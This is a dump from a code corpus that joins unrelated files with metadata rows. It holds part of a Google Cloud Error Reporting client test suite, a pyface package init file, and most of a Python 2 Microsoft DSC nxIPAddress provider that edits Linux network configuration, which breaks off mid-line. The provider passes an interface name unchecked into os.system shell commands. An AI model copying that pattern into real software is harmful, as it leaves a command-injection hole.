with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReportErrorsServiceTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_report_errors_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ReportErrorsServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_report_errors_service_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ReportErrorsServiceClient()
adc.assert_called_once_with(
scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.ReportErrorsServiceGrpcTransport,
transports.ReportErrorsServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_gte_1_25_0
def test_report_errors_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class",
[
transports.ReportErrorsServiceGrpcTransport,
transports.ReportErrorsServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_lt_1_25_0
def test_report_errors_service_transport_auth_adc_old_google_auth(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.ReportErrorsServiceGrpcTransport, grpc_helpers),
(transports.ReportErrorsServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
def test_report_errors_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(
quota_project_id="octopus",
scopes=["1", "2"]
)
create_channel.assert_called_with(
"clouderrorreporting.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
scopes=["1", "2"],
default_host="clouderrorreporting.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("transport_class", [transports.ReportErrorsServiceGrpcTransport, transports.ReportErrorsServiceGrpcAsyncIOTransport])
def test_report_errors_service_grpc_transport_client_cert_source_for_mtls(
transport_class
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert,
private_key=expected_key
)
def test_report_errors_service_host_no_port():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='clouderrorreporting.googleapis.com'),
)
assert client.transport._host == 'clouderrorreporting.googleapis.com:443'
def test_report_errors_service_host_with_port():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='clouderrorreporting.googleapis.com:8000'),
)
assert client.transport._host == 'clouderrorreporting.googleapis.com:8000'
def test_report_errors_service_grpc_transport_channel():
channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.ReportErrorsServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_report_errors_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.ReportErrorsServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.ReportErrorsServiceGrpcTransport, transports.ReportErrorsServiceGrpcAsyncIOTransport])
def test_report_errors_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.ReportErrorsServiceGrpcTransport, transports.ReportErrorsServiceGrpcAsyncIOTransport])
def test_report_errors_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = ReportErrorsServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = ReportErrorsServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder, )
actual = ReportErrorsServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = ReportErrorsServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization, )
actual = ReportErrorsServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = ReportErrorsServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project, )
actual = ReportErrorsServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = ReportErrorsServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = ReportErrorsServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = ReportErrorsServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.ReportErrorsServiceTransport, '_prep_wrapped_messages') as prep:
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.ReportErrorsServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = ReportErrorsServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
| apache-2.0 | -5,023,281,741,818,850,000 | 41.550218 | 257 | 0.680398 | false |
geggo/pyface | pyface/tree/api.py | 1 | 1198 | #------------------------------------------------------------------------------
# Copyright (c) 2005-2011, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
from __future__ import absolute_import
from .node_event import NodeEvent
from .node_monitor import NodeMonitor
from .node_manager import NodeManager
from .node_tree import NodeTree
from .node_tree_model import NodeTreeModel
from .node_type import NodeType
from .trait_dict_node_type import TraitDictNodeType
from .trait_list_node_type import TraitListNodeType
from .tree_model import TreeModel
from traits.etsconfig.api import ETSConfig
if ETSConfig.toolkit == 'wx':
# Tree has not yet been ported to qt
from .tree import Tree
del ETSConfig
| bsd-3-clause | 3,699,413,282,578,178,600 | 36.4375 | 79 | 0.682805 | false |
MSFTOSSMgmt/WPSDSCLinux | Providers/Scripts/2.4x-2.5x/Scripts/nxIPAddress.py | 2 | 31170 | #!/usr/bin/env python
#============================================================================
# Copyright (c) Microsoft Corporation. All rights reserved. See license.txt for license information.
#============================================================================
import os
import sys
import tempfile
import re
import platform
import imp
import socket
protocol=imp.load_source('protocol','../protocol.py')
"""
MOF:
[ClassVersion("1.0.0"), FriendlyName("nxIPAddress")]
class MSFT_nxIPAddress : OMI_BaseResource
{
[write] string IPAddress;
[Key] string InterfaceName;
[write,ValueMap{"Automatic", "Static"},Values{"Automatic", "Static"}] string BootProtocol;
[write] string DefaultGateway;
[write,ValueMap{"Present", "Absent"}, Values{"Present", "Absent"}] string Ensure;
[write] integer PrefixLength;
[Key,write,ValueMap{"IPv4", "IPv6"},Values{"IPv4", "IPv6"}] string AddressFamily;
};
"""
def Print(s,file=sys.stdout):
file.write(s+'\n')
def ValidateAddresses(IPAddress,AddressFamily,PrefixLength):
if 'IPv4' in AddressFamily:
ptype=socket.AF_INET
elif 'IPv6' in AddressFamily:
ptype=socket.AF_INET6
else:
return False
try:
socket.inet_pton(ptype,IPAddress)
except:
Print('Error: IPAddress "'+IPAddress+'" is invalid.',file=sys.stderr)
return False
if type(PrefixLength) == int or type(PrefixLength) == long :
if 'IPv4' in AddressFamily and ( PrefixLength < 0 or PrefixLength > 32) :
Print('Error: PrefixLength "'+ str(PrefixLength) +'" is invalid. Values are 0-32.',file=sys.stderr)
return False
if 'IPv6' in AddressFamily and ( PrefixLength < 0 or PrefixLength > 128) :
Print('Error: PrefixLength "'+ str(PrefixLength) +'" is invalid. Values are 0-128.',file=sys.stderr)
return False
return True
def bitNetmaskConversion(PrefixLength):
if PrefixLength == '':
return ''
if type(PrefixLength) != long and type(PrefixLength) != int :
N = int(PrefixLength)
else :
N = PrefixLength
M = int(N / 8) #number of 255 sections (full octets)
MASK = 255
netmaskIP = ""
count = 0
while count < M:
netmaskIP = netmaskIP + "255."
count += 1
if N % 8 != 0:
netmaskIP += str((MASK << (8 - N%8)) & MASK) + "."
count += 1
while count < 4:
netmaskIP = netmaskIP + "0."
count += 1
if netmaskIP[-1] == ".":
netmaskIP = netmaskIP[:-1]
return netmaskIP
def netmaskBitConversion(netmask):
if netmask==None or netmask=='' :
return 0
arrTmp = netmask.strip("'")
arr = arrTmp.split(".")
sumT = 0
for i in arr:
i = int(i)
if i == 255:
sumT += 8
else:
j = 0
while j < 8:
sumT += (i >> j) & 1
j+=1
return sumT
def init_vars(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
if PrefixLength == None:
PrefixLength=''
if BootProtocol == None or len(BootProtocol)<1:
BootProtocol='Automatic'
else :
BootProtocol=BootProtocol[0].upper()+BootProtocol[1:].lower()
if Ensure == None or len(Ensure)<1:
Ensure='Present'
else :
Ensure=Ensure[0].upper()+Ensure[1:].lower()
if AddressFamily == None or len(AddressFamily)<1:
AddressFamily='IPv4'
else :
AddressFamily=AddressFamily[0].upper()+AddressFamily[1].upper()+AddressFamily[2].lower()+AddressFamily[3:]
if IPAddress == None:
IPAddress=''
if len(IPAddress)>0:
if ValidateAddresses(IPAddress,AddressFamily,PrefixLength) == False:
return False,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
elif BootProtocol != 'Automatic' and Ensure == 'Present':
Print('ERROR: BootProtocol != Automatic. IPAdress is required.',file=sys.stdout)
return False,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
if DefaultGateway == None:
DefaultGateway=''
if len(DefaultGateway) > 0 and ValidateAddresses(DefaultGateway,AddressFamily,'') == False:
return False,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
return True,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
def Set_Marshall(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
ret,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily = \
init_vars(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
if ret is False :
return [-1]
MyDistro=GetMyDistro()
retval = MyDistro.Set(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
return retval
def Test_Marshall(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
ret,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily = \
init_vars(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
if ret is False :
return [-1]
MyDistro=GetMyDistro()
return MyDistro.Test(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
def Get_Marshall(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
arg_names=list(locals().keys())
ret,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily = \
init_vars(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
if ret is False :
return [-1,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily]
retval = 0
MyDistro=GetMyDistro()
(retval, IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily) = MyDistro.Get(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
Ensure = protocol.MI_String(Ensure.encode("utf-8"))
IPAddress = protocol.MI_String(IPAddress.encode("utf-8"))
AddressFamily= protocol.MI_String(AddressFamily.encode("utf-8"))
InterfaceName = protocol.MI_String(InterfaceName.encode("utf-8"))
BootProtocol = protocol.MI_String(BootProtocol.encode("utf-8"))
DefaultGateway = protocol.MI_String(DefaultGateway.encode("utf-8"))
if type(PrefixLength) == int or type(PrefixLength) == long :
PrefixLength=protocol.MI_Uint32(PrefixLength)
else:
PrefixLength=protocol.MI_Uint32(int(PrefixLength))
retd={}
ld=locals()
for k in arg_names :
retd[k]=ld[k]
return retval, retd
def ReplaceFileContentsAtomic(filepath, contents):
"""
Write 'contents' to 'filepath' by creating a temp file, and replacing original.
"""
handle, temp = tempfile.mkstemp(dir = os.path.dirname(filepath))
if type(contents) == str :
contents=contents.encode('latin-1')
try:
os.write(handle, contents)
except IOError, e:
Print('ReplaceFileContentsAtomic','Writing to file ' + filepath + ' Exception is ' + str(e),file=sys.stderr)
return None
os.close(handle)
try:
os.rename(temp, filepath)
return None
except IOError, e:
Print('ReplaceFileContentsAtomic','Renaming ' + temp+ ' to ' + filepath + ' Exception is ' +str(e),file=sys.stderr)
try:
os.remove(filepath)
except IOError, e:
Print('ReplaceFileContentsAtomic','Removing '+ filepath + ' Exception is ' +str(e),file=sys.stderr)
try:
os.rename(temp,filepath)
except IOError, e:
Print('ReplaceFileContentsAtomic','Removing '+ filepath + ' Exception is ' +str(e),file=sys.stderr)
return 1
return 0
def GetMyDistro(dist_class_name=''):
"""
Return MyDistro object.
NOTE: Logging is not initialized at this point.
"""
if dist_class_name == '':
if 'Linux' in platform.system():
Distro=platform.dist()[0]
else : # I know this is not Linux!
if 'FreeBSD' in platform.system():
Distro=platform.system()
Distro=Distro.strip('"')
Distro=Distro.strip(' ')
dist_class_name=Distro+'Distro'
else:
Distro=dist_class_name
if not globals().has_key(dist_class_name):
Print(Distro+' is not a supported distribution.')
return None
return globals()[dist_class_name]() # the distro class inside this module.
class AbstractDistro(object):
def __init__(self):
self.gateway_file='/etc/sysconfig/network'
self.gateway_prefix=''
self.ifcfg_prefix='/etc/sysconfig/network-scripts/ifcfg-'
def init_re_dict(self,src_dict):
re_dict=dict()
for k in src_dict:
re_dict[k]=re.compile(r'\s*'+k+'.*')
return re_dict
def init_src_dicts(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
self.gateway_dict=dict()
self.ifcfg_v4_dict=dict()
self.ifcfg_v4_dict['ONBOOT=']='yes'
self.ifcfg_v4_dict['DEVICE=']=InterfaceName
if BootProtocol.lower() == 'static':
self.ifcfg_v4_dict['BOOTPROTO=']='none'
else:
self.ifcfg_v4_dict['BOOTPROTO=']='dhcp'
self.ifcfg_v4_dict['DHCPCLASS=']=''
self.ifcfg_v4_dict['IPADDR=']=IPAddress
if PrefixLength != 0 and PrefixLength != '':
self.ifcfg_v4_dict['NETMASK=']=bitNetmaskConversion(PrefixLength)
else:
self.ifcfg_v4_dict['NETMASK=']=''
self.ifcfg_v6_dict=dict()
self.ifcfg_v6_dict['ONBOOT=']='yes'
self.ifcfg_v6_dict['DEVICE=']=InterfaceName
if BootProtocol.lower() == 'static':
self.ifcfg_v6_dict['BOOTPROTO=']='none'
else:
self.ifcfg_v6_dict['BOOTPROTO=']='dhcp'
self.ifcfg_v6_dict['DHCPCLASS=']=''
if BootProtocol.lower() == 'static':
self.ifcfg_v6_dict['IPV6INIT=']='yes'
self.ifcfg_v6_dict['IPV6_AUTOCONF=']='no'
else :
self.ifcfg_v6_dict['IPV6INIT=']='yes'
self.ifcfg_v6_dict['IPV6_AUTOCONF=']='yes'
if PrefixLength != 0 and PrefixLength != '':
self.ifcfg_v6_dict['IPV6ADDR=']=IPAddress+'/'+str(PrefixLength)
else:
self.ifcfg_v6_dict['IPV6ADDR=']=IPAddress
self.gateway_dict['GATEWAY=']=DefaultGateway
if AddressFamily == 'IPv4':
self.ifcfg_dict=self.ifcfg_v4_dict
self.addr_key='IPADDR='
else :
self.ifcfg_dict=self.ifcfg_v6_dict
self.addr_key='IPV6ADDR='
self.gateway_dict['NETWORKING_IPV6=']='yes'
def src_dicts_to_params(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
if AddressFamily=='IPv4':
if 'NETMASK=' in self.ifcfg_dict.keys() and len(self.ifcfg_dict['NETMASK=']) > 0 :
PrefixLength=netmaskBitConversion(self.ifcfg_dict['NETMASK='])
elif PrefixLength != '' and PrefixLength > 0 and '/' in self.ifcfg_dict[self.addr_key] :
PrefixLength=int(self.ifcfg_dict[self.addr_key].split('/')[1])
self.ifcfg_dict[self.addr_key]=self.ifcfg_dict[self.addr_key].split('/')[0]
bootproto=''
if BootProtocol != None and len(BootProtocol) > 0 :
if self.ifcfg_dict['BOOTPROTO='] == 'dhcp':
bootproto='Automatic'
else:
bootproto='Static'
gateway=''
if len(self.gateway_dict['GATEWAY=']) >0:
gateway=self.gateway_dict['GATEWAY=']
return self.ifcfg_dict[self.addr_key],self.ifcfg_dict['DEVICE='],bootproto,gateway,Ensure,PrefixLength,AddressFamily
def restart_network(self,Interface):
os.system('ifdown ' + Interface)
os.system('ifup ' + Interface)
return [0]
def interface_down(self,Interface):
os.system('ifconfig ' + Interface + ' down')
return [0]
def UpdateValuesInFile(self,fname,src_dict,re_dict,Ensure):
updated=''
if os.path.exists(fname) != True:
# if this file is not here - we will create it
try:
F = open(fname,'w+')
F.write('# Created by Microsoft DSC nxIPAddress Provider\n')
F.close()
except:
raise
try:
F = open(fname,'r')
for l in F.readlines():
if l[0]=='#':
updated+=l
continue
for k in re_dict:
if re_dict[k]!=None:
if re.match(re_dict[k],l): # re.match is anchored to the line start.
if len(src_dict[k])==0 :
l=''
re_dict[k]=None
break
else:
l=re.sub(re_dict[k],k+src_dict[k],l)
re_dict[k]=None
if len(l)>2:
updated+=l
for k in re_dict:
if re_dict[k] != None and len(src_dict[k]) > 0 :
l=k+src_dict[k]+'\n'
updated+=l
except:
raise
ReplaceFileContentsAtomic(fname,updated)
return [0]
def GetValuesFromFile(self,fname,src_dict,re_dict):
if os.path.exists(fname) != True:
return
try:
F = open(fname,'r')
for l in F.readlines():
for k in re_dict:
if re_dict[k]!=None:
if re.match(re_dict[k],l): # re.match is anchored to the line start.
src_dict[k]=l.split(k[-1])[1].strip('\n')
re_dict[k]=None
F.close()
except:
raise
def Set(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
retval=[-1]
if len(self.ifcfg_prefix)>0:
self.ifcfg_file=self.ifcfg_prefix+InterfaceName
if len(self.gateway_prefix)>0:
self.gateway_file=self.gateway_prefix+InterfaceName
self.init_src_dicts(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
gateway_re_dict=self.init_re_dict(self.gateway_dict)
ifcfg_re_dict=self.init_re_dict(self.ifcfg_dict)
if Ensure == 'Absent':
if len(self.ifcfg_prefix)>0:
if os.path.exists(self.ifcfg_file):
os.remove(self.ifcfg_file)
retval=[0]
else:
retval=self.UpdateValuesInFile(self.ifcfg_file,self.ifcfg_dict,ifcfg_re_dict,Ensure)
if len(self.gateway_prefix)>0:
if os.path.exists(self.gateway_file):
os.remove(self.gateway_file)
retval=[0]
else:
retval=self.UpdateValuesInFile(self.gateway_file,self.gateway_dict,gateway_re_dict,Ensure)
self.interface_down(InterfaceName)
else:
retval=self.UpdateValuesInFile(self.gateway_file,self.gateway_dict,gateway_re_dict,Ensure)
retval=self.UpdateValuesInFile(self.ifcfg_file,self.ifcfg_dict,ifcfg_re_dict,Ensure)
retval=self.restart_network(InterfaceName)
return retval
def Test(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
if len(self.ifcfg_prefix)>0:
self.ifcfg_file=self.ifcfg_prefix+InterfaceName
if len(self.gateway_prefix)>0:
self.gateway_file=self.gateway_prefix+InterfaceName
self.init_src_dicts(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
test_gateway=dict(self.gateway_dict)
for k in test_gateway:
test_gateway[k]=''
test_gateway_re_dict=self.init_re_dict(self.gateway_dict)
self.GetValuesFromFile(self.gateway_file,test_gateway,test_gateway_re_dict)
for k in self.gateway_dict:
if k == 'default ' and len(self.gateway_dict[k]) >0: # SuSE
self.gateway_dict[k]=self.gateway_dict[k].split(' ')[0]
if self.gateway_dict[k] != test_gateway[k]:
return [-1]
test_ifcfg=dict(self.ifcfg_dict)
for k in test_ifcfg:
if k != 'iface ':
test_ifcfg[k]=''
test_ifcfg_re_dict=self.init_re_dict(self.ifcfg_dict)
self.GetValuesFromFile(self.ifcfg_file,test_ifcfg,test_ifcfg_re_dict)
if Ensure == 'Absent':
if 'iface ' in test_ifcfg.keys() and test_ifcfg['iface ']!=None and len(test_ifcfg['iface '])>0:
return [-1]
elif len(self.ifcfg_prefix)>0 and os.path.exists(self.ifcfg_file) :
return [-1]
else:
return [0]
for k in self.ifcfg_dict:
if self.ifcfg_dict[k] != test_ifcfg[k]:
return [-1]
return [0]
def Get(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
# calling Test here will fill the dicts with values
self.Test(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily = \
self.src_dicts_to_params(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
if PrefixLength=='':
PrefixLength=0
return 0,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
class SuSEDistro(AbstractDistro):
def __init__(self):
super(SuSEDistro,self).__init__()
self.gateway_prefix='/etc/sysconfig/network/ifroute-'
self.ifcfg_prefix='/etc/sysconfig/network/ifcfg-'
def init_src_dicts(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
self.gateway_v4_dict=dict()
self.gateway_v6_dict=dict()
if BootProtocol.lower() != 'static' or len(DefaultGateway) == 0:
self.gateway_v4_dict['default ']=''
self.gateway_v6_dict['default ']=''
else:
self.gateway_v4_dict['default ']=DefaultGateway+' '+bitNetmaskConversion(PrefixLength)+' '+InterfaceName
self.gateway_v6_dict['default ']=DefaultGateway+' '+InterfaceName
self.ifcfg_v4_dict=dict()
if BootProtocol.lower() != 'static':
self.ifcfg_v4_dict['BOOTPROTO=']='dhcp'
else:
self.ifcfg_v4_dict['BOOTPROTO=']='static'
self.ifcfg_v4_dict['STARTMODE=']='auto'
self.ifcfg_v4_dict['IPADDR=']=IPAddress
self.ifcfg_v4_dict['NETMASK=']=bitNetmaskConversion(PrefixLength)
self.ifcfg_v6_dict=dict()
if BootProtocol.lower() != 'static':
self.ifcfg_v6_dict['BOOTPROTO=']='autoip'
else:
self.ifcfg_v6_dict['BOOTPROTO=']='static'
self.ifcfg_v6_dict['STARTMODE=']='auto'
if PrefixLength != 0 and PrefixLength != '':
self.ifcfg_v6_dict['IPADDR=']=IPAddress+'/'+str(PrefixLength)
else:
self.ifcfg_v6_dict['IPADDR=']=IPAddress
if AddressFamily == 'IPv4':
self.ifcfg_dict=self.ifcfg_v4_dict
self.addr_key='IPADDR='
self.gateway_dict=self.gateway_v4_dict
else :
self.ifcfg_dict=self.ifcfg_v6_dict
self.addr_key='IPADDR='
self.gateway_dict=self.gateway_v6_dict
def src_dicts_to_params(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
if AddressFamily=='IPv4':
if 'NETMASK=' in self.ifcfg_dict.keys() and len(self.ifcfg_dict['NETMASK=']) > 0 :
PrefixLength=netmaskBitConversion(self.ifcfg_dict['NETMASK='])
elif PrefixLength != '' and PrefixLength > 0 and '/' in self.ifcfg_dict[self.addr_key] :
PrefixLength=int(self.ifcfg_dict[self.addr_key].split('/')[1])
self.ifcfg_dict[self.addr_key]=self.ifcfg_dict[self.addr_key].split('/')[0]
bootproto=''
if BootProtocol != '' and 'BOOTPROTO=' in self.ifcfg_v4_dict.keys() and len(self.ifcfg_v4_dict['BOOTPROTO=']) >0 :
